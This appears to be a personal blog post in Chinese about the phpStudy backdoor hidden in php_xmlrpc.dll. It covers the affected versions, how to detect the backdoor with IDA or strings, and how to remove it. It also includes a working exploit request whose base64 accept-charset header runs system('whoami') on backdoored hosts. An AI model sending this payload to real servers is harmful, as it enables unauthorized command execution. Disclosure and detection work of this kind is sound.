phpstudy后门事件

phpstudy后门事件 -> 我的虚拟机中招了 😂

最近，phpstudy 后门事件搞得风风火火的，然后我检查了自己的笔记本，发现没有中招，本来还高兴于自己的安全意识，因为我下载软件基本从官网下载。结果当我打开我的虚拟机的时候，发现这个版本和我自己用的版本不一致，于是我测试了一下，down，后门存在。虚拟机上也放了一丢丢的敏感文件，这次真的是有点尴尬了，赶紧删除对应版本。不给我平常用的都是7.0，所以问题也不算太大。看来以后下载东西真的要严格把关了。虚拟机上的这个我觉得是虚拟机就随便搞了一个进去，结果就中招了。

漏洞范围

phpstudy2016-2018，php5.4.45 文件夹下的 php_xmlrpc.dll （我这里的还有php5.4.45 nts 这个文件下的php_xmlrpc.dll是没有后门的），另外网上都是说只有php5.4.45，结果我的虚拟机上的2018还发现5.2.17也存在。所以大家最好检查每个版本的php里面的php_xmlrpc.dll 文件
payload：

GET /flag.php HTTP/1.1
Host: 192.168.37.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

因为是加载的dll，所以这里随意请求个php文件都可以执行，所以还是很猛的。

分析

我这里是phpstudy2018 打开 phpstudy2018\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
拖入IDA 字符串视图 直接搜索eval即可看到后门

如果你没有IDA也很简单，随便找个能看字符串的打开对应 php_xmlrpc.dll 搜索eval，比如linux：

strings php_xmlrpc.dll | grep eval

#回显：
zend_eval_string
@eval(%s('%s'));
%s;@eval(%s('%s'));

修复建议

还想接着用就直接删除 php_xmlrpc.dll 当然最好是去官网下载没有后门的phpstudy。